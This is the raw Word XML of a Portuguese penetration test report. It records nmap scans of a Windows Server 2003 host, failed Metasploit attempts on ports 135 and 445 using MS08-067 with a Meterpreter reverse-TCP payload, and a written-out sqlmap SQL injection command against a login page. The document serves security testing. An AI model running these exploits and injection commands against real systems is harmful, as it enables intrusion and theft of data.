          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema operacional 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é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178EE" w:rsidRPr="00F15F82" w:rsidRDefault="003178EE" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003178EE" w:rsidRPr="00F15F82" w:rsidRDefault="003178EE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spera-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas e a versão dos serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003178EE" w:rsidRPr="00F15F82" w:rsidRDefault="003178EE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</w:p>
    <w:p w:rsidR="005F79D1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3178EE" w:rsidRDefault="003178EE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De acordo com a figura 9, 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s portas abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F79D1" w:rsidRPr="00F15F82" w:rsidRDefault="005F79D1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6382FD0" wp14:editId="748F2656">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>62865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>220345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5676900" cy="3851275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21475"/>
                <wp:lineTo x="21528" y="21475"/>
                <wp:lineTo x="21528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D2B" w:rsidRPr="00F15F82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igura 9 - Versão do software rodando nas portas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3178EE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530877" w:rsidRPr="00F15F82" w:rsidRDefault="0053087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</w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="0053087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A00BE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 xml:space="preserve">Serviços </w:t>
      </w:r>
      <w:r w:rsidR="003178EE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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ncontrados na figura </w:t>
      </w:r>
      <w:r w:rsidR="002B1EF3" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9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30877" w:rsidRPr="00F15F82" w:rsidRDefault="00AA00BE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="00530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta semelhante ao </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82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="00530877" w:rsidRPr="00F15F82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:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00AA00BE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="00530877" w:rsidRPr="00F15F82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="00530877" w:rsidRPr="00F15F82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</w:t>
      </w:r>
      <w:r w:rsidR="002B1EF3" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ens em uma distribuição Windows;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00AA00BE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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>httpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B1EF3" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Servidor Web;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00AA00BE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 </w:t>
      </w:r>
      <w:r w:rsidR="00530877"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Windows 98 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netbios-ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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530877" w:rsidRPr="00F15F82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T</w:t>
      </w:r>
      <w:r w:rsidR="002B1EF3" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ansporte do modelo OSI para permitir a co</w:t>
      </w:r>
      <w:r w:rsidR="002B1EF3" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>municação de aplicativos locais;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00AA00BE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0877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Firmware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ppt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82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bookmarkEnd w:id="0"/>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00530877" w:rsidP="00F3154F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A83EB9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7</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Utilização do comand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F248B" w:rsidRPr="00F15F82" w:rsidRDefault="00AF248B" w:rsidP="0063043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” executa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” permite que a ferramenta use o detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00184BA7" w:rsidRPr="00F15F82" w:rsidRDefault="00184BA7" w:rsidP="0063043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-p” indica quais portas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devem</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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ser usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00184BA7" w:rsidRPr="00F15F82" w:rsidRDefault="00184BA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O” permite que a ferramenta tente encontrar o sistema operacional </w:t>
      </w:r>
      <w:r w:rsidR="009C3F25" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizado pelo servidor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FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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é o IP onde está hospedada a aplicação em teste.</w:t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C3F25" w:rsidRPr="00F15F82" w:rsidRDefault="009C3F25" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3F25" w:rsidRPr="00F15F82" w:rsidRDefault="009C3F2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>Espera-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas UDP abertas e a versão e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3F25" w:rsidRPr="00F15F82" w:rsidRDefault="009C3F25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</w:p>
    <w:p w:rsidR="00240857" w:rsidRDefault="005967D5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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan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highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3F25" w:rsidRPr="00F15F82" w:rsidRDefault="00184BA7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De acordo com a figura 10</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009C3F25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foi possível descobrir o sistema operacional utilizado pelo servidor explorado: </w:t>
      </w:r>
      <w:r w:rsidR="009C3F25" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Windows Server 2003.</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25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</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Também foi possível descobrir</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25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s portas</w:t>
      </w:r>
      <w:r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UDP</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00F15F82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32BEA109" wp14:editId="5634B068">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>72390</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-52070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5705475" cy="4083685"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0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C7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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igura 10 - Versão do software rodando nas portas UDP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EC5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00EC5D2B" w:rsidP="00F315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F15F82" w:rsidRDefault="00A66072" w:rsidP="00F3154F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Serviços Encontrados na imagem acima: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gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-n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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82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spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dgm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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>snmp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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-d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protocol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compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915C31" w:rsidRPr="00F15F82" w:rsidRDefault="00915C31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L2TP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5F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(Protocolo de Encapsulamento de Camada </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)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[11] – Protocolo de encapsulamento da Internet, utilizado por uma conexão de VPN (rede virtual privada) para acessar uma rede privada;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00967B9F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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-t-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lik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A6607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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntp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[3] - protocolo de sincronização de relógios usando </w:t>
      </w:r>
      <w:r w:rsidR="00967B9F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00240857">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3154F" w:rsidRPr="00F15F82" w:rsidRDefault="00F3154F" w:rsidP="00F3154F">
      <w:p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F15F82" w:rsidRDefault="00A6607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Ataque à porta RPC - via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE6FEB" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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10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taque à porta RPC descoberta na análise de servidor vi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realizada anteriormente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Tentar se conectar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à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porta 135 usando o framework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tentar conseguir privilégios dentro do Window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Tentar configurar algum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que ataque a porta 135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A ferramenta </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">é de difícil configuração e possui documentação muito ruim para iniciantes.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Não foi possível obter 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>nenhum resulta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escolhido para testar o caso específico da porta RPC foi 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auxiliary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scanner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msf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msf_rpc_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.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a ser executado é o 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1A5B8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foi enviado</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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mas</w:t>
      </w:r>
      <w:proofErr w:type="gram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não trouxe resultado. Após verificação, foi constatado que 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é voltado pra Windows NT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Tentar atacar a porta 445 usan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automatizados.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Para esse caso,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escolhido foi o MS08-67 disponível no caminho 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smb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/ms08_067_netapi.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Ele serve especificamente para explorar uma vulnerabilidade do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F8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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d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.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é o utilizado n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máquina atacante via TCP. </w:t>
      </w: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 xml:space="preserve">Espera-se que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1A5B8E"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não foi executado na máquina do servidor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51591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entar atacar a porta 135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escolhido foi o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auxiliary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scanner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msf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msf_rpc_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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para testar o caso específico da porta RPC escolhida.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a ser executado é o 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windows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meterprete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reverse_tc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Ess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força a máquina atacada a abrir uma conexão com a </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB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máquina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atacante via TCP. </w:t>
      </w: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1A5B8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spera-se que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ão consiga ser executado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82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1A5B8E"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não foi executado na máquina do servidor.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2.3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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proofErr w:type="gramEnd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Tela de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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proofErr w:type="spellStart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qlmap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no dia 11/04.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="005A089C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2 horas e 30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tilizar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automatizar o processo de detecção de vulnerabilidades na tela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fazendo uso injeção SQL.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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="0048383A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</w:p>
    <w:p w:rsidR="00FE6FEB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Verificar se a tela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é vulnerável a injeção de código SQL. Caso haja vulnerabilidade, conseguir obter o nome do banco de dados utilizado pelo sistema.</w:t>
      </w:r>
      <w:r w:rsidR="00FE6FEB" w:rsidRPr="00F15F8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FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="001A5B8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spera-se que a tela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ão seja vulnerável à injeção de SQL e consequentemente não seja possível descobrir o nome do banco de dados utilizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FE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6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FEB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 xml:space="preserve">Para realizar essa Sessão de teste foi necessário utilizar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capturar as informações de cookie contidas no cabeçalho de requisição HTTP no momento em que a página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é acessada. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00EC5D2B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D038A" w:rsidRPr="00F15F82" w:rsidRDefault="000D038A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4AD8EBF" wp14:editId="714A14EB">
            <wp:extent cx="3971925" cy="1276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11(Editada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E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Figura 11- Parâmetros obtidos através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ntrada: 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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://IP_do_servidor/</w:t>
        </w:r>
        <w:r w:rsidR="009C5396" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>nome_do_sistema</w:t>
        </w:r>
        <w:r w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F15F82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" 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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--cookie="PHSESSID=75ce718b37088517cafla733d53c60f</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b  --current -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82"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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">./sqlmap.py” comando utilizado para executar a ferramenta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“-u” utilizado</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82"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 w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para especificar a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“--cookie” utilizado para especificar um cookie de sessão válido a ser passado para o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
